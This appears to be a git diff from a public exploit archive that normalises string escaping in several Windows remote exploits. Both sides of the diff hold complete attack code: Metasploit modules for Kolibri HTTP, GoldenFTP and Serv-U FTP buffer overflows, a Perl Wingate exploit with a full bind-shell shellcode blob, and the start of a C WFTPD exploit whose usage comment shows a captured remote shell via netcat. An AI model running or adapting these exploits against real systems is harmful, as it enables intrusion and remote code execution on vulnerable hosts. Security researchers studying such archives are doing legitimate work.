-		buf = \\\"\\\\x30\\\\x82\\\\x0a\\\\x3d\\\\x02\\\\x01\\\\x01\\\\x60\\\\x82\\\\x01\\\\x36\\\\x02\\\\xff\\\\xff\\\\xff\\\\xff\\\\x20\\\"
-		buf << \\\"\\\\xcc\\\" * 5000
+		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
+		buf << "\xcc" * 5000
 
 		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
 		# Thanks for johnny cyberpunk for 6/7 vs 8 diffs
 
-		buf[77, 4] = \\\"\\\\xeb\\\\x06\\\"
-		buf[81, 4] = [target.ret].pack(\\\'V\\\') # 6.x, 7.x
-		buf[85, 4] = \\\"\\\\xeb\\\\x06\\\"
-		buf[89, 4] = [target.ret].pack(\\\'V\\\') # 8.x
+		buf[77, 4] = "\xeb\x06"
+		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
+		buf[85, 4] = "\xeb\x06"
+		buf[89, 4] = [target.ret].pack('V') # 8.x
 		buf[93, payload.encoded.length] = payload.encoded
 
 		sock.put(buf)
diff --git a/platforms/windows/remote/16970.rb b/platforms/windows/remote/16970.rb
index 6a0dfb7a4..c97da148b 100755
--- a/platforms/windows/remote/16970.rb
+++ b/platforms/windows/remote/16970.rb
@@ -9,53 +9,53 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
 
-	HttpFingerprint = { :pattern => [ /kolibri-2\\.0/ ] }
+	HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Egghunter
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow\',
-			\'Description\'    => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
-			\'Author\'         => 
+			'Name'           => 'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow',
+			'Description'    => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
+			'Author'         => 
 					[ 
-						\'mr_me <steventhomasseeley@gmail.com>\', # msf
-						\'TheLeader\' # original exploit
+						'mr_me <steventhomasseeley@gmail.com>', # msf
+						'TheLeader' # original exploit
 					],
-			\'Version\'        => \'$Revision: 10887 $\',
-			\'References\'     =>
+			'Version'        => '$Revision: 10887 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2002-2268\' ],
-					[ \'OSVDB\', \'70808\' ],
-					[ \'BID\', \'6289\' ],
-					[ \'URL\', \'http://www.exploit-db.com/exploits/15834/\' ],
+					[ 'CVE', '2002-2268' ],
+					[ 'OSVDB', '70808' ],
+					[ 'BID', '6289' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/15834/' ],
 				],
-			\'Privileged\'     => false,
-			\'Payload\'        =>
+			'Privileged'     => false,
+			'Payload'        =>
 				{
-					\'Space\'       => 3000,
-					\'DisableNops\' => true,
-					\'BadChars\'    => \"\\x00\\x0d\\x0a\\x3d\\x20\\x3f\",
+					'Space'       => 3000,
+					'DisableNops' => true,
+					'BadChars'    => "\x00\x0d\x0a\x3d\x20\x3f",
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Windows XP sp3\', { \'Ret\' => 0x7E429353 } ] ,
-					[ \'Windows Server 2003 sp2\', { \'Ret\' => 0x76F73BC3 } ] ,
+					[ 'Windows XP sp3', { 'Ret' => 0x7E429353 } ] ,
+					[ 'Windows Server 2003 sp2', { 'Ret' => 0x76F73BC3 } ] ,
 				],
-			\'DisclosureDate\' => \'Dec 26 2010\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Dec 26 2010',
+			'DefaultTarget'  => 0))
 	end
 
 	def check
 		info = http_fingerprint
-		if info and (info =~ /kolibri-2\\.0/)
+		if info and (info =~ /kolibri-2\.0/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		Exploit::CheckCode::Safe
@@ -65,15 +65,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		#7E429353    FFE4            JMP     ESP
 		# For a reliable and large payload, we use an egg hunter
 		# and direct RET to execute code
-		print_status(\"Sending request...\")
+		print_status("Sending request...")
 		eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars)
-		sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack(\'V\')
+		sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack('V')
 		sploit << eh_stub
 		send_request_raw({
-			\'uri\'     => \"/\" + sploit,
-			\'version\' => \'1.1\',
-			\'method\'  => \'HEAD\',
-			\'headers\' => {\'Content-Type\' => eh_egg},
+			'uri'     => "/" + sploit,
+			'version' => '1.1',
+			'method'  => 'HEAD',
+			'headers' => {'Content-Type' => eh_egg},
 		})
 
 		handler
diff --git a/platforms/windows/remote/17355.rb b/platforms/windows/remote/17355.rb
index 77ad0d656..0b3aa77d9 100755
--- a/platforms/windows/remote/17355.rb
+++ b/platforms/windows/remote/17355.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,49 +18,49 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'GoldenFTP PASS Stack Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'GoldenFTP PASS Stack Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a vulnerability in the Golden
 				FTP service. This module uses the PASS command to trigger the overflow.
 			},
-			\'Author\'         => [ \'bannedit\' ],
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 12812 $\',
-			\'References\'     =>
+			'Author'         => [ 'bannedit' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 12812 $',
+			'References'     =>
 				[
-					[ \'BID\', \'45957 \'],
-					[ \'URL\', \'http://www.exploit-db.com/exploits/16036/\'],
+					[ 'BID', '45957 '],
+					[ 'URL', 'http://www.exploit-db.com/exploits/16036/'],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'seh\',
+					'EXITFUNC' => 'seh',
 				},
-			\'Privileged\'     => false,
-			\'Payload\'        =>
+			'Privileged'     => false,
+			'Payload'        =>
 				{
-					\'Space\'    => 350,
-					\'BadChars\' => \"\\x00\\x0a\\x0d\",
+					'Space'    => 350,
+					'BadChars' => "\x00\x0a\x0d",
 				},
-			\'Platform\'       => [\'win\'],
-			\'Targets\'        =>
+			'Platform'       => ['win'],
+			'Targets'        =>
 				[
 					[
-						\'Golden FTP 4.70 Universal\', # Tested OK - bannedit 05/31/2011
+						'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011
 						{
-							\'Platform\' => \'win\',
-							\'Ret\'      => 0x00a93ca6,
+							'Platform' => 'win',
+							'Ret'      => 0x00a93ca6,
 						},
 					]
 
 				],
-			\'DisclosureDate\' => \'Jan 23 2011\'))
+			'DisclosureDate' => 'Jan 23 2011'))
 	end
 	
 	def check
 		connect
 		disconnect
-		print_status(\"FTP Banner: #{banner}\".strip)
-		if banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\"
+		print_status("FTP Banner: #{banner}".strip)
+		if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"
 			return Exploit::CheckCode::Appears
 		else
 			return Exploit::CheckCode::Safe
@@ -68,21 +68,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		if datastore[\'RHOST\'].length < 15
-			pad = make_nops(1) * (15 - datastore[\'RHOST\'].length)
+		if datastore['RHOST'].length < 15
+			pad = make_nops(1) * (15 - datastore['RHOST'].length)
 		end
 		
 		sploit = make_nops(4) * 38
 		sploit << payload.encoded
 		sploit << pad
 		sploit << make_nops(1) * (528 - sploit.length)
-		sploit << [target.ret].pack(\'V\')
+		sploit << [target.ret].pack('V')
 
-		print_status(\"Connecting to #{datastore[\'RHOST\']}:#{datastore[\'RPORT\']}\")
+		print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
 		begin
 			connect
-			send_user(\"anonymous\")
-			send_cmd([\'PASS\', sploit], false)
+			send_user("anonymous")
+			send_cmd(['PASS', sploit], false)
 			handler
 		rescue EOFError
 		end
diff --git a/platforms/windows/remote/18190.rb b/platforms/windows/remote/18190.rb
index 94df92429..00a254b21 100755
--- a/platforms/windows/remote/18190.rb
+++ b/platforms/windows/remote/18190.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Serv-U FTP Server <4.2 Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Serv-U FTP Server <4.2 Buffer Overflow',
+			'Description'    => %q{
 				This module exploits a stack buffer overflow in the site chmod command
 				in versions of Serv-U FTP Server prior to 4.2.
 
 				You must have valid credentials to trigger this vulnerability. Exploitation
 				also leaves the service in a non-functional state.
 			},
-			\'Author\'         => \'thelightcosine <thelightcosine[at]metasploit.com>\',
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision$\',
-			\'References\'     =>
+			'Author'         => 'thelightcosine <thelightcosine[at]metasploit.com>',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
 				[
-					[ \'CVE\', \'2004-2111\'],
-					[ \'BID\', \'9483\'],
+					[ 'CVE', '2004-2111'],
+					[ 'BID', '9483'],
 				],
-			\'Privileged\'     => true,
-			\'DefaultOptions\' =>
+			'Privileged'     => true,
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'BadChars\'    => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",
-					\'DisableNops\' => true,
+					'BadChars'    => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
+					'DisableNops' => true,
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Windows 2000 SP0-4 EN\', {
-						\'Ret\'    => 0x750212bc, #WS2HELP.DLL
-						\'Offset\' => 396 } ],
-					[ \'Windows XP SP0-1 EN\', {
-						\'Ret\'    => 0x71aa388f, #WS2HELP.DLL
-						\'Offset\' => 394 } ]
+					[ 'Windows 2000 SP0-4 EN', {
+						'Ret'    => 0x750212bc, #WS2HELP.DLL
+						'Offset' => 396 } ],
+					[ 'Windows XP SP0-1 EN', {
+						'Ret'    => 0x71aa388f, #WS2HELP.DLL
+						'Offset' => 394 } ]
 				],
-			\'DisclosureDate\' => \'Dec 31 2004\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Dec 31 2004',
+			'DefaultTarget'  => 0))
 	end
 
 	def check
 		connect
 		disconnect
 
-		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\\d)/)
+		if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
 			return Exploit::CheckCode::Vulnerable
 		end
 			return Exploit::CheckCode::Safe
@@ -76,23 +76,23 @@ class Metasploit3 < Msf::Exploit::Remote
 		eggoptions =
 		{
 			:checksum => true,
-			:eggtag => \"W00T\"
+			:eggtag => "W00T"
 		}
 
 		hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
 
 
-		buffer = \"chmod 777 \"
-		buffer <<  make_nops(target[\'Offset\'] - egg.length - hunter.length)
+		buffer = "chmod 777 "
+		buffer <<  make_nops(target['Offset'] - egg.length - hunter.length)
 		buffer << egg
 		buffer << hunter
-		buffer << \"\\xeb\\xc9\\x41\\x41\"	#nseh, jump back to egghunter
-		buffer << [target.ret].pack(\'V\')	#seh
+		buffer << "\xeb\xc9\x41\x41"	#nseh, jump back to egghunter
+		buffer << [target.ret].pack('V')	#seh
 		buffer << rand_text(5000)
 
-		print_status(\"Trying target #{target.name}...\")
+		print_status("Trying target #{target.name}...")
 
-		send_cmd( [\'SITE\', buffer] , false)
+		send_cmd( ['SITE', buffer] , false)
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/1885.pl b/platforms/windows/remote/1885.pl
index f69a16d55..962d4ce8c 100755
--- a/platforms/windows/remote/1885.pl
+++ b/platforms/windows/remote/1885.pl
@@ -1,75 +1,75 @@
-### *** Proof of concept (not for \"in the wild\" kiddies) ***
+### *** Proof of concept (not for "in the wild" kiddies) ***
 ### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
 ### by kcope in 2006
 ###
 use IO::Socket;
 
-if ($ARGV[0] eq \"\")
+if ($ARGV[0] eq "")
 {
- print \"param1 = remote host\";
+ print "param1 = remote host";
  exit;
 }
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
 my $shellcode =
-\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".
-\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".
-\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".
-\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".
-\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\".
-\"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\".
-\"\\x4e\\x46\\x46\\x32\\x46\\x52\\x4b\\x48\\x45\\x44\\x4e\\x33\\x4b\\x38\\x4e\\x47\".
-\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x31\\x4b\\x58\".
-\"\\x4f\\x35\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x33\\x4b\\x48\".
-\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c\".
-\"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".
-\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x52\\x4a\\x32\\x45\\x57\\x45\\x4e\\x4b\\x58\".
-\"\\x4f\\x35\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x48\\x4e\\x50\\x4b\\x34\".
-\"\\x4b\\x48\\x4f\\x45\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x43\\x30\\x4e\\x52\\x4b\\x58\".
-\"\\x49\\x48\\x4e\\x46\\x46\\x32\\x4e\\x31\\x41\\x36\\x43\\x4c\\x41\\x43\\x4b\\x4d\".
-\"\\x46\\x56\\x4b\\x58\\x43\\x44\\x42\\x33\\x4b\\x58\\x42\\x34\\x4e\\x30\\x4b\\x48\".
-\"\\x42\\x47\\x4e\\x31\\x4d\\x4a\\x4b\\x58\\x42\\x54\\x4a\\x30\\x50\\x35\\x4a\\x46\".
-\"\\x50\\x38\\x50\\x34\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x48\\x46\".
-\"\\x43\\x35\\x48\\x56\\x4a\\x46\\x43\\x53\\x44\\x53\\x4a\\x46\\x47\\x47\\x43\\x47\".
-\"\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\".
-\"\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x38\\x45\\x4e\".
-\"\\x48\\x36\\x41\\x38\\x4d\\x4e\\x4a\\x50\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x30\".
-\"\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x45\".
-\"\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x43\\x35\\x43\\x35\\x43\\x55\\x43\\x35\\x43\\x44\".
-\"\\x43\\x35\\x43\\x44\\x43\\x35\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4a\\x46\\x41\\x31\".
-\"\\x4e\\x45\\x48\\x56\\x43\\x55\\x49\\x48\\x41\\x4e\\x45\\x59\\x4a\\x46\\x46\\x4a\".
-\"\\x4c\\x41\\x42\\x37\\x47\\x4c\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x42\\x51\".
-\"\\x41\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x46\\x4a\\x4d\\x4a\\x50\\x52\".
-\"\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x45\\x4f\\x4f\\x42\\x4d\".
-\"\\x4a\\x36\\x45\\x4e\\x49\\x54\\x48\\x48\\x49\\x54\\x47\\x35\\x4f\\x4f\\x48\\x4d\".
-\"\\x42\\x35\\x46\\x35\\x46\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x46\".
-\"\\x47\\x4e\\x49\\x57\\x48\\x4c\\x49\\x57\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x45\\x45\".
-\"\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4c\\x46\\x46\\x46\\x48\\x36\\x4a\\x56\\x43\\x46\".
-\"\\x4d\\x46\\x49\\x38\\x45\\x4e\\x4c\\x56\\x42\\x55\\x49\\x35\\x49\\x52\\x4e\\x4c\".
-\"\\x49\\x38\\x47\\x4e\\x4c\\x46\\x46\\x34\\x49\\x38\\x44\\x4e\\x41\\x43\\x42\\x4c\".
-\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x34\\x4d\\x42\\x50\\x4f\\x44\\x54\\x4e\\x32\".
-\"\\x43\\x39\\x4d\\x58\\x4c\\x47\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\".
-\"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x54\\x4f\\x4f\".
-\"\\x48\\x4d\\x4b\\x45\\x47\\x45\\x44\\x55\\x41\\x55\\x41\\x35\\x41\\x35\\x4c\\x56\".
-\"\\x41\\x30\\x41\\x55\\x41\\x55\\x45\\x55\\x41\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\".
-\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x36\".
-\"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\".
-\"\\x43\\x58\\x46\\x4c\\x46\\x46\\x4f\\x4f\\x48\\x4d\\x44\\x35\\x4f\\x4f\\x42\\x4d\".
-\"\\x4a\\x56\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x35\\x43\\x35\\x4f\\x4f\\x48\\x4d\".
-\"\\x4f\\x4f\\x42\\x4d\\x5a\";
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
+"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
+"\x4e\x46\x46\x32\x46\x52\x4b\x48\x45\x44\x4e\x33\x4b\x38\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58".
+"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x58".
+"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34".
+"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x58".
+"\x49\x48\x4e\x46\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d".
+"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x58\x42\x34\x4e\x30\x4b\x48".
+"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x54\x4a\x30\x50\x35\x4a\x46".
+"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
+"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x47".
+"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
+"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
+"\x48\x36\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30".
+"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
+"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x35\x43\x55\x43\x35\x43\x44".
+"\x43\x35\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x31".
+"\x4e\x45\x48\x56\x43\x55\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a".
+"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x56\x42\x51".
+"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52".
+"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
+"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d".
+"\x42\x35\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
+"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x35\x4f\x4f\x48\x4d\x45\x45".
+"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x56\x43\x46".
+"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
+"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c".
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x42\x50\x4f\x44\x54\x4e\x32".
+"\x43\x39\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46".
+"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
+"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x55\x41\x35\x41\x35\x4c\x56".
+"\x41\x30\x41\x55\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56".
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36".
+"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f".
+"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
+"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
+"\x4f\x4f\x42\x4d\x5a";
 
 $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
-                              PeerPort => \'80\',
-                              Proto    => \'tcp\');
+                              PeerPort => '80',
+                              Proto    => 'tcp');
 
-$ret = \"\\x4b\\x4f\\x9e\\x01\";	# JMP ESI Win2k SP4 German
-$x = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXXXXYYYYZZZZ\"
-.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXXXXYYYYZZZZ\"
-.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS\".$ret.\"UUUUVVVVWWWWXXXXYYYYZZZZ\"
-.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXXXXYYYYZZZZ\"
-.\"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\\xeb\\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXXXXYYYYZZZZ\";
-$a = \"A\" x 2000 . $x . \"\\x90\" x 100 . $shellcode;
-print $sock \"POST http://$a/ HTTP/1.0\\r\\n\\r\\n\";
+$ret = "\x4b\x4f\x9e\x01";	# JMP ESI Win2k SP4 German
+$x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXXXXYYYYZZZZ"
+."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXXXXYYYYZZZZ"
+."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS".$ret."UUUUVVVVWWWWXXXXYYYYZZZZ"
+."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXXXXYYYYZZZZ"
+."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXXXXYYYYZZZZ";
+$a = "A" x 2000 . $x . "\x90" x 100 . $shellcode;
+print $sock "POST http://$a/ HTTP/1.0\r\n\r\n";
 
 
 while (<$sock>) {
diff --git a/platforms/windows/remote/2233.c b/platforms/windows/remote/2233.c
index eff79a34e..93cfb71ac 100755
--- a/platforms/windows/remote/2233.c
+++ b/platforms/windows/remote/2233.c
@@ -5,7 +5,7 @@
 * tested on XP SP2 polish, 2000 SP4 polish
 * example..
 
-C:\\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
+C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
 
 [*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
 [*] coded by h07 <h07@interia.pl>
@@ -14,11 +14,11 @@ C:\\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
 [+] sending buffer: ok
 [*] press enter to quit
 
-C:\\>nc -l -p 4444
+C:\>nc -l -p 4444
 Microsoft Windows XP [Wersja 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 
-C:\\wftpd323>
+C:\wftpd323>
 */
 
 #include <stdio.h>
@@ -30,26 +30,26 @@ C:\\wftpd323>
 
 char shellcode[] =
 
-\"\\x31\\xc9\\x83\\xe9\\xb8\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xb6\"
-\"\\x10\\x92\\x98\\x83\\xeb\\xfc\\xe2\\xf4\\x4a\\x7a\\x79\\xd5\\x5e\\xe9\\x6d\\x67\"
-\"\\x49\\x70\\x19\\xf4\\x92\\x34\\x19\\xdd\\x8a\\x9b\\xee\\x9d\\xce\\x11\\x7d\\x13\"
